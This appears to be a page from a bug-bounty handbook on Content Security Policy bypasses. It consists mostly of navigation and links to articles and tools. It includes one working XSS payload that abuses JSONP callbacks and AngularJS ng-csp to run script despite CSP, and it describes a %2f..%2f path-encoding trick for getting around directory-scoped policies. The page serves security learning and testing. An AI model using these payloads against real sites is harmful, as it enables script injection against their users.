Bug Hunter Handbook
  • Introduction
  • Getting Started in InfoSec and Bug Bounties.
  • Presentations
  • Checklists / Guides
  • Useful Twitter Threads
  • List of Vulnerabilities
    • Recon and OSINT
      • Recon
      • Sensitive information using Github
      • Subdomain Enumeration
        • Resolvers
      • Javascript Enumeration
      • After Recon
      • Finding Information Using Public Resources
      • OSINT
      • Cloud
      • Wayback
      • Parameter / Content Discovery
      • Broken Link Highjacking
    • Host Header
    • Injection
      • Other Injection
    • DNS Rebinding
    • Cross Site Scripting (XSS)
      • Weaponizing XSS
      • WAF Bypass
    • Cross Origin Resource Sharing (CORS)
    • Local / Remote File Inclusion (LFI / RFI)
    • Server Side Request Forgery (SSRF)
    • Remote Code Execution (RCE)
    • XML Entity Injecton (XXE)
    • Price Manipulation
    • Directory / Path Traversal
    • Cross Site Request Forgery (CSRF)
      • JSON CSRF
    • Password Reset
    • Login Page Issues
    • Deserialization Attacks
    • File Upload
    • Account Takeover
    • Insecure Direct Object References (IDOR)
    • Open Redirect
    • Business Logic Flaws
    • Rate Limit Bypass / 2FA / OTP Bypass
    • Ruby on Rails
      • Mass Assginment
    • S3 Bucket
    • Race Condition
    • CRLF
    • SSTI
    • Prototype Pollution
  • Approach
  • API Security
  • Mobile Security
  • Fuzzing / Wordlists
  • BugBounty Short Write-ups
  • Burp Suite Tips and Tricks
  • HackerOne Reports
  • Response Manipulation
  • Client Vs Server Side Vulnerabilities
  • DevSecOps
  • Containers
    • Docker
    • Kubernetes
    • Containers
  • AWS
  • Azure
  • Others
    • Code Review
    • Web Sockets
    • Web Cache
    • HTTP Desync Attacks
    • Zone Transfer
    • CSP Bypass
    • Payment Bypasses
    • Http Parameter Pollution
    • Postmessage
    • Others
    • GraphQL
    • Unix / Linux
    • Email Related
    • Dependency confusion
    • Nginx Misconfigs
    • JIRA
    • OAUTH
  • Chaining of Bugs
  • Bug Bounty Automation
  • Mindmaps
  • Oneliner Collections
  • Red Teaming
  • Blue Teamining
  • Recon One Liners
  • Misc
  • Wordpress
  • Fuzzing / FuFF
  • OWASP ZAP
  • Bug List
  • Setting up burp collaborator
  • Admin Panel PwN
  • Credential Stuffing / Dump / HaveibeenPwned?
  • Tools Required
  • Nuclei Template
  • Other BugBounty Repos / Tips
  • Interview
  • Threat Modelling
  • AppSec
Powered by GitBook
On this page

Was this helpful?

  1. Others

CSP Bypass

PreviousZone TransferNextPayment Bypasses

Last updated 6 months ago

Was this helpful?

  • : <script src="https://trustedsite/jsonp?callback=payload"> <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

  • JSONP can be a serious security vulnerability. Another good read from my colleague :)

Articles:

https://ritiksahni.me/content-security-policy
https://twitter.com/CurtBraz/status/1180372698167435265?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1183061305483239424%7Ctwcon%5Etimelinechrome&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1183061305483239424
#JSONP
#AngularJS
#BugBountyTip
Accessing cross-site data using JSONPsjoerdlangkemper.nl
https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that. This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://jsbin.com/werevijewa/edit?html,output…
https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
http://ghostlulz.com/content-security-policy-csp-bypasses/
https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
https://github.com/zigoo0/JSONBee
https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/csp-host-checker.py
https://addons.mozilla.org/en-US/firefox/addon/laboratory-by-mozilla/
https://2018.zeronights.ru/wp-content/uploads/materials/3%20ZN2018%20WV%20-%20CSP%20bypass.pdf
https://dropbox.tech/security/unsafe-inline-and-nonce-deployment
https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/
https://scotthelme.co.uk/content-security-policy-an-introduction/
https://scotthelme.co.uk/csp-cheat-sheet/
https://barryvanveen.nl/blog/47-how-to-prevent-the-use-of-unsafe-inline-in-csp
https://www.netsparker.com/blog/web-security/negative-impact-incorrect-csp-implementations/
https://content-security-policy.com/unsafe-inline/
Image